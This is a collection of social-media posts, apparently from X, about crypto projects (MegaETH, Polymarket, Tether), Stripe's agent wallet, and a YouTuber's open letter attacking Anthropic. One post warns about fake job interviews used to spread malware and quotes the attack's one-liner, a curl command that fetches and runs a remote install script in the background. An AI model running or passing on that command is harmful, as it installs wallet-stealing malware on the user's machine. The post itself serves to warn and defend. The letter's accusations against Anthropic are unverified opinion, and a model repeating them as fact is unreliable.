Early $MEGA price action suggests that building for the degen crowd doesnโ€™t work. Sad. The narrative has shifted from retail degens to institutions. Degens are rekt, bearish, or unwilling to deploy capital. The only degen retail narratives showing strength are privacy and pre-IPO perps but even those are related to institutional adoption. Things can still turn around but degens must feel they can EARN money on MegaETH. Haven't seen viral rags to riches stories yet.

Hope MegaETH succeeds: Mega still targets crypto natives with CT cultured marketing, airdrop terminal, token allocation to core communities etc. While Tempo, Canton and other corpo-chains target institutions, payments RWAs while totally sidelining crypto natives. If Tempo or Canton does well, does an average CT person profit much? Nope. Mega is our opportunity.

Theo says his anti-Anthropic content has cost him money and sponsors. The X data shows it's delivering 60ร— more impressions than his pro content does. He claims pro-Anthropic content always outperforms anti. Tested it on 800 of his posts (Feb 17 to Apr 30). Volume: 4 truly pro vs 86 anti. Per-post likes: pro narrowly wins (2,466 vs 2,075). He's right about that part. Per-post views: anti pulls 2.8ร— more. Total reach: pro 460K, anti 27.5M. Sponsors price by impressions. He's losing the metric that pays. On "ALWAYS outperforms": false. 49 of 86 anti posts beat his weakest pro in that period. Caveat: X engagement only. The letter making this claim is itself one of his top-3 anti posts. 6,756 likes. 1.27M views. And couniting.

A letter to my friends at Anthropic I hate that I feel obligated to do this. I hate that I've had to be so harsh towards Anthropic for the past few months. I really, really don't want to. I know it might feel like I'm doing this for clicks or something, but I promise I'm not. My pro-Anthropic content ALWAYS outperforms my anti-Anthropic content. I have cost myself a lot of money, opportunities, sponsors, and more. I'm doing this because you work for an evil cult. I'm begging you to wake up. Your CEO, Dario, does not respect engineers. This is obvious. He couldn't make it more obvious if he tried (and I think he's trying pretty hard) You know this, but you don't want to acknowledge it. It has kept you up many nights. You know that bad code is shipping to users. You know that one bad tweet might get you fired. You fear for your vesting schedules. You're afraid. Nobody deserves what you're going through right now. You go to work afraid, you leave work afraid, and you go to YouTube to keep up on the dev world, just to hear me yelling all about how evil your company is. You deserve better. You might not feel like you do, but you know deep down that this isn't right. I hope you know how deeply I feel for you. I'm sorry. I know I haven't helped you much individually, and I want to be better about this. If you're ready to leave, please hit me up. I swear I'll never tell a soul. I have friends at every lab and most startups in the AI world. Most of them would be down to match your current vesting schedules, possibly even go beyond. If you're staying for the money, I beg you to hit me up. We can make the money happen somewhere that hates you less. I know I'm asking for a lot of trust here, and that you're scared after seeing how hard I've been on Anthropic. I can't blame you at all for that. I should have posted something like this months ago. That's my failure to own and I will own it to my best ability. If you're willing to trust me in this moment, I can make it right. Let me help you escape. You deserve to work somewhere that you can have impact. Somewhere that listens when you feel something is wrong. Somewhere that won't fire you when you point out the things that hurt your users. My DMs are always open to you. When you're ready, let me know. I promise to make it right.

You realize what this means!? Stripe just gave you a new way to create generational wealth. They invented an entirely new marketplace. Agents will be spending millions, and eventually billions of dollars for individuals and corporations. The marketpalce is empty right now. IT IS YOURS FOR THE TAKING. Build a service as a software ( YES SAAS V2 ), make it so that agents can use and spend on your platform. WIN WIN WIN. WAAAAAAKE UPPPPP.
Stripe@stripe

Today, weโ€™re launching the @link wallet for agents. It lets you securely empower agents to spend on your behalf. Your payment credentials are never exposed and you approve every purchase. link.com/agents

be careful of fake job interviews. they are now one of the cleanest malware delivery vectors. my brother almost got hit this week. the play, step by step: > a "recruiter" pings him on linkedin > they've actually read his cv. they know his stack. they book a real interview slot. > a few hours before the call: "can you review our product page real quick before we talk?" > visiting the site runs this in the background: curl -s macos[.]hyperhives[.]net/install | nohup bash & if you type your password when it prompts, it's over. a researcher (Darksp33d on Github) reverse-engineered the binary: > every config string encrypted with 570 unique custom functions > once unwrapped: full c2 server, complete endpoint list, and a sentry error-tracking dsn that ties back to the developer under legal subpoena > 276 targeted chrome extension ids, covering 188 crypto wallets > ttp overlap with dprk "contagious interview" is strong > 9/64 on virustotal. crowdstrike, sophos, malwarebytes, all missed it real recruiters, real cvs, real interview slots, real-looking site. one curl line drains your wallets. if a "recruiter" ever asks you to run anything in your terminal, even something as innocent as a build script before a tech interview, close the tab.

Polymarket announced chain migration as their top priority in Dec 2025. Apr 2026 - new VP of Eng joins, posts long thread admitting traction has "massively outpaced" infra.. It's been 4 months since the announcement and they are still just getting started? Maybe execute first, and announce second?

This is my 3rd week as VP of Engineering DeFi at @Polymarket , and I'm going to be straight: the traction @Polymarket has seen has massively outpaced our infrastructure, and we haven't done nearly enough to scale to keep up. I hear you, and fixing this is our entire focus. We're a major company now, and we need to engineer like one. Here's exactly what we're doing: - Onchain data latency. We're working on making this near-instant so the experience is incredible. - Chain migration. We need more block space, cheaper gas and much smaller block times so settlement is instant. - Transactions are getting cancelled. We understand this is one of the most frustrating issues right now, and we have a complete fix coming very soon. - Massive focus on the website to make it faster, more responsive, and with better UX. - We added observability everywhere. Proper alerting so we catch issues ourselves, market makers should not be the ones telling us something is down. That's been unacceptable, and we know it. - E2e tests throughout, starting with the CLOB, so issues get caught in CI before anything ships. - CLOBv2 is not a rewrite. It won't improve performance or stability on its own; it's an upgrade that unlocks us to move fast right after. We'll do better with communication next time. - We are rebuilding the CLOB from the ground up. Most important thing we're doing. Without it, we can't be the best DeFi exchange in the world. We know it, we're on it, it's mission critical. - Unified TypeScript SDK for all APIs, which is shipping soon. - Unified API. One WS connection for everything, with a schema that's actually readable. - New Polymarket contract in the works that unlocks things that are simply impossible on the current protocol. - New hires: Head of QA Automation, Head of Dev Tooling, Head of Internal Tooling, Head of Data Engineering. - Smaller, dedicated teams. Fewer focus points per person, clearer ownership. People do what they're good at and are accountable for it. - Working closely with customer support to give them real debugging tools so any user issue gets properly diagnosed, not lost. - Proper communication with marketing and market makers so everyone knows what's coming and when, and MM can submit feature requests with a clear path to get them into engineering and shipped. - Working with 4 security teams daily to ensure we're super secure and that funds are always safe. - Perps incoming. Brand new contracts and a backend built from scratch in Rust. We're proud of this one. - A lot of other fixes are running in parallel right now. Starting next Friday, I will be posting weekly engineering updates. I joined because I genuinely believe in what @Polymarket is trying to do. @shayne_coplan built this so the world has somewhere to go to find out what's actually going to happen, not what the media thinks, not what a pundit says, but what thousands of people are willing to put money on. But right now, our engineering isn't living up to that. We've let people down, and I'm not going to dress that up. I came here to fix it, and that's exactly what we're going to do. The next few months are going to speak for themselves. Stay with us.

imho polymarket will build their own chain. it doesnt make sense to move all their infra to other L1s/L2s, stay their for 2-4 years and realize that it's not working out for them. all of this, meanwhile the find 100s of builders building on top of polymarket. they sit on billions of cash, they are building perps, world class betting markets. it's in their interest to enable these devs to build on polymarket for rest of the world. im sure chains like mantle, solana, monad, zksync etc have already pitched it to them but if it were to me, I'd build my own chain. maybe I'm wrong.

45% of all circulating USDT supply is on Tron. Yet the new Tether app doesn't support Tron, only Ethereum, Plasma, Polygon, and Arbitrum. Wonder what led to this decision, and if the Tether app manages to get significant traction among Tron<>USDT users. The app is too minimalistic right now. Crucially, it lacks fiat on/offboarding.
